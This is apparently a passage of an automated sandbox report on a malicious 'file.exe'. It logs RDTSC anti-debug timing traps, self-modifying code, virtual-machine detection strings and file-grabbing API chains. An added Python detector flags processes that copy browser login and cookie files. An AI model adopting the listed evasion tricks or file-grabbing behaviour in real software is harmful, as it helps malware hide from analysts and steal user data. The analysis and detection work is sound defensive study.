                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76986A second address: 76986E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76986E second address: 76988A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EB05 second address: 76EB2F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA43130E330h 0x00000008 jmp 00007FA43130E328h 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007FA43130E31Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EB2F second address: 76EB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jmp 00007FA430E679F1h 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EB4A second address: 76EB73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E321h 0x00000007 pushad 0x00000008 jmp 00007FA43130E323h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EC98 second address: 76EC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EC9C second address: 76ECA9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECA9 second address: 76ECAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECAE second address: 76ECB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECB3 second address: 76ECD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FA430E679F4h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECD3 second address: 76ED03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FA43130E31Bh 0x0000000d pushad 0x0000000e jmp 00007FA43130E324h 0x00000013 js 00007FA43130E316h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ED03 second address: 76ED0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ADBC second address: 77ADC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ADC0 second address: 77ADCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ADCF second address: 77ADE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA43130E31Ch 0x0000000a jng 00007FA43130E326h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ADE8 second address: 77AE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679EAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FA430E679E8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AE01 second address: 77AE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AE07 second address: 77AE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AF48 second address: 77AF67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnc 00007FA43130E316h 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FA43130E31Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AF67 second address: 77AF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FA430E679EAh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FA430E679E6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E294 second address: 77E29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784670 second address: 784676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784676 second address: 78467A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78467A second address: 7846A8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA430E679EEh 0x00000008 jbe 00007FA430E679E6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA430E679F6h 0x0000001c pop esi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7911B3 second address: 7911C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Bh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7911C5 second address: 7911DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7911DB second address: 7911F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E324h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79559D second address: 7955A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7955A8 second address: 7955AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79572C second address: 795748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA430E679E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA430E679EFh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795748 second address: 79574C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C92 second address: 795C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C96 second address: 795CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA43130E31Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795CAD second address: 795CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795CC8 second address: 795CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796733 second address: 79673B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79673B second address: 79673F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79673F second address: 79674F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA430E679E6h 0x00000008 jne 00007FA430E679E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A402 second address: 79A41C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E320h 0x00000007 jnp 00007FA43130E316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799ECA second address: 799EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA430E679F2h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799EE5 second address: 799EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799EE9 second address: 799EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A07E second address: 79A0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FA43130E322h 0x0000000d jng 00007FA43130E316h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A0A0 second address: 79A0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD90B second address: 7AD90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A21A6 second address: 7A21AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C91DD second address: 7C91E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C94A7 second address: 7C94AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C94AD second address: 7C94CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA43130E326h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C961D second address: 7C9621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C9B68 second address: 7C9B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7C9E23 second address: 7C9E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CCA5B second address: 7CCA71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CCA71 second address: 7CCA86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CCF52 second address: 7CCF89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E323h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub edx, 09EC2623h 0x00000012 push dword ptr [ebp+122D28F2h] 0x00000018 add edx, dword ptr [ebp+122D3382h] 0x0000001e push BFB87420h 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 push eax 0x00000027 pop eax 0x00000028 pop esi 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CE17C second address: 7CE181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CE181 second address: 7CE197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CE197 second address: 7CE19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CFD33 second address: 7CFD37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7CFD37 second address: 7CFD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FA430E679E6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 ja 00007FA430E679E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52C02F2 second address: 52C02FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 3972h 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52C02FB second address: 52C030E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679EFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52C030E second address: 52C0346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov edi, 4EB39E46h 0x00000011 mov dx, 58D2h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007FA43130E329h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52C037D second address: 52C0412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FA430E679EFh 0x0000000c sbb al, 0000003Eh 0x0000000f jmp 00007FA430E679F9h 0x00000014 popfd 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov dx, B652h 0x0000001c mov esi, edi 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FA430E679EBh 0x00000027 xor cl, 0000004Eh 0x0000002a jmp 00007FA430E679F9h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FA430E679EDh 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FA430E679F8h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52C0412 second address: 52C0421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52C0421 second address: 52C0439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA430E679F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F6811 second address: 6F6816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F6816 second address: 6F681C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F697D second address: 6F6981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6EBF57 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 713BD7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6F26CF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002EF68A FindFirstFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002E1160 GetSystemInfo,ExitProcess
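The FindFirstFileA / StrCmpCA / CopyFileA / DeleteFileA / FindNextFileA chains above are directory walks: the two StrCmpCA calls right after FindFirstFileA are the usual skip of the "." and ".." entries, PathMatchSpecA applies a wildcard mask, and every matching file is copied and then deleted again. The detector below is an added example, not from the report: it scores each process in a simplified, constructed API trace on how many files it copied out of user-data directories within a short window and how many of those copies it then deleted. Reading the CopyFileA/DeleteFileA pair as copy-then-discard of the copy, the user-data path markers and the trace itself are all assumptions of this example.

```python
"""Detection logic for a file-grabber loop over an API trace.

Added example; not code from the report or from the sample. The trace shape
(ts, pid, api, args) is a simplification constructed for this example.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiCall:
    ts: float      # seconds since trace start
    pid: int
    api: str
    args: tuple


# Profile locations where browser databases, wallets and documents live.
# An assumption of this example; extend for your environment.
USER_DATA_MARKERS = (r"\appdata\local", r"\appdata\roaming", r"\documents", r"\desktop")


def is_user_data(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_DATA_MARKERS)


def score_processes(trace, window=30.0, min_copies=3):
    """Return {pid: finding} for processes that look like a grabber loop.

    A finding needs at least `min_copies` CopyFileA calls whose source is under
    a user-data location, all within `window` seconds. DeleteFileA of a path
    that was previously a CopyFileA destination is counted separately as the
    copy-then-discard pattern seen in the chains above.
    """
    by_pid = defaultdict(list)
    for call in trace:
        by_pid[call.pid].append(call)
    findings = {}
    for pid, calls in by_pid.items():
        calls.sort(key=lambda c: c.ts)
        enumerated = [c.args[0] for c in calls
                      if c.api == "FindFirstFileA" and is_user_data(c.args[0])]
        staged = {}      # destination path -> time CopyFileA wrote it
        deleted = 0
        for c in calls:
            if c.api == "CopyFileA" and is_user_data(c.args[0]):
                staged[c.args[1].lower()] = c.ts
            elif c.api == "DeleteFileA" and c.args[0].lower() in staged:
                deleted += 1
        if not staged:
            continue
        span = max(staged.values()) - min(staged.values())
        if len(staged) >= min_copies and span <= window:
            findings[pid] = {"copies": len(staged), "copies_deleted": deleted,
                             "seconds": round(span, 3), "enumerated_dirs": enumerated}
    return findings


# Constructed trace (not from the report): pid 6756 walks a browser profile,
# copies three files to Temp and deletes each copy; pid 1234 is a user copying
# one document to a removable drive.
CHROME = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
TMP = r"C:\Users\user\AppData\Local\Temp"
TRACE = [
    ApiCall(0.00, 6756, "FindFirstFileA", (CHROME + r"\*",)),
    ApiCall(0.01, 6756, "CopyFileA", (CHROME + r"\Login Data", TMP + r"\a1.tmp")),
    ApiCall(0.02, 6756, "DeleteFileA", (TMP + r"\a1.tmp",)),
    ApiCall(0.03, 6756, "FindNextFileA", ()),
    ApiCall(0.04, 6756, "CopyFileA", (CHROME + r"\Cookies", TMP + r"\a2.tmp")),
    ApiCall(0.05, 6756, "DeleteFileA", (TMP + r"\a2.tmp",)),
    ApiCall(0.06, 6756, "FindNextFileA", ()),
    ApiCall(0.07, 6756, "CopyFileA", (CHROME + r"\Web Data", TMP + r"\a3.tmp")),
    ApiCall(0.08, 6756, "DeleteFileA", (TMP + r"\a3.tmp",)),
    ApiCall(0.09, 6756, "FindClose", ()),
    ApiCall(5.00, 1234, "CopyFileA", (r"C:\Users\user\Documents\report.docx", r"E:\report.docx")),
]

if __name__ == "__main__":
    for pid, finding in score_processes(TRACE).items():
        print(pid, finding)
```

The threshold matters: with min_copies lowered to 1 the benign single copy by pid 1234 is flagged as well, so tune it against the normal copy rate of the hosts you monitor rather than against the malware alone.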
                Source: file.exe, file.exe, 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2102958941.0000000001382000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWNm
                Source: file.exe, 00000000.00000002.2102958941.0000000001382000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWXg8
                Source: file.exe, file.exe, 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
